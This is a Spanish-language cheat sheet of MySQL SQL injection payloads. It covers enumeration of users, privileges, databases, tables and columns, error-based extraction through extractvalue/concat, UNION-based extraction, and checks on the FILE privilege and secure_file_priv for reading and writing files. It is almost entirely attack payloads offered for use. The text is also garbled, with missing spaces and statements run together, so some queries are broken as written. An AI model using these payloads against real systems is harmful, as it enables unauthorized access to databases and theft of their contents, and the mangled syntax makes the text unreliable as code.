# Usuario actualSELECTcurrent_user()SELECTsystem_user()SELECT user()# Listado de usuariosSELECT user FROM mysql.user
Privilegios
# Privilegios SELECT grantee,privilege_type FROM information_schema.user_privileges# Privilegio de superusuario (Y = Yes)SELECT super_priv FROM mysql.user WHERE user="<user>"
Bases de datos
# Nombre de base de datos actualSELECTdatabase()# Listado de base de datosSHOW databasesSELECT table_schema FROM information_schema.tables GROUP BY table_schema
Tablas
# Tablas de base de datos actualSHOW tables# Tablas de una base de datosSELECT table_schema, table_name FROM information_schema.tables WHERE table_schema='<database>'
Columnas
# Columnas de una tablaSELECT column_name, data_type from information_schema.columns WHERE table_schema='<database>'AND table_name='<table>'
# Nombre de base de datos actualextractvalue('',concat('>',database()))# Listado de base de datosextractvalue('',concat('>',(SELECT group_concat(table_schema) FROM (SELECT table_schema FROM information_schema.tables GROUP BY table_schema) AS foo) ))
Tablas
extractvalue('',concat('>',(SELECT group_concat(table_name) FROM (SELECT table_name from information_schema.tablesWHERE table_schema='<database>') AS foo) ))extractvalue('',concat('>',(SELECT group_concat(table_name) FROM (SELECT table_name from information_schema.tablesWHERE table_schema='<database>'AND table_name NOTIN ('<table>')) AS foo) ))# Ir incrementando el valor de offsetextractvalue('',concat('>',(SELECT group_concat(table_name) FROM (SELECT table_name from information_schema.tablesWHERE table_schema='<database>'limit1 offset 1)AS foo) ))
Columnas
extractvalue('',concat('>',(SELECT group_concat(column_name) FROM (SELECT column_name FROM information_schema.columns WHERE table_schema='<database>'AND table_name='<table>') AS foo) ))extractvalue('',concat('>',(SELECT group_concat(column_name) FROM (SELECT column_name FROM information_schema.columns WHERE table_schema='<database>'AND table_name='<table>'AND column_name NOTIN ('<column>')) AS foo) ))
# Nombre de base de datos actualUNIONSELECT1,database(),3,4-- -# Listado de base de datosUNIONSELECT1,schema_name,3,4FROM information_schema.schemata-- -
Tablas
UNIONSELECT1,table_schema,table_name,4FROM information_schema.tables WHERE table_schema='<database>'-- -
Columnas
UNION SELECT 1,column_name,data_type,2 FROM information_schema.columns WHERE table_schema='<database>' AND table_name='<table>'-- -
Para poder leer y escribir archivos se deben cumplir las siguientes condiciones:
El usuario debe tener habilitado el privilegio "FILE".
Valor de la variable global secure_file_priv:
Un valor vacÃo nos permite leer y escribir en cualquier directorio.
Si se establece un determinado directorio, solo podemos leer y escribir desde la carpeta especificada por la variable.
NULL significa que no podemos leer y escribir en ningún directorio.
Acceso de lectura y escritura a la ubicación en la que queremos leer o escribir el archivo.
Obtener valor de la variable global secure_file_priv.
SELECT @@GLOBAL.secure_file_privSELECT variable_name, variable_value FROM information_schema.global_variables WHERE variable_name="secure_file_priv"UNION SELECT 1,variable_name,variable_value,4 FROM information_schema.global_variables WHERE variable_name="secure_file_priv"-- -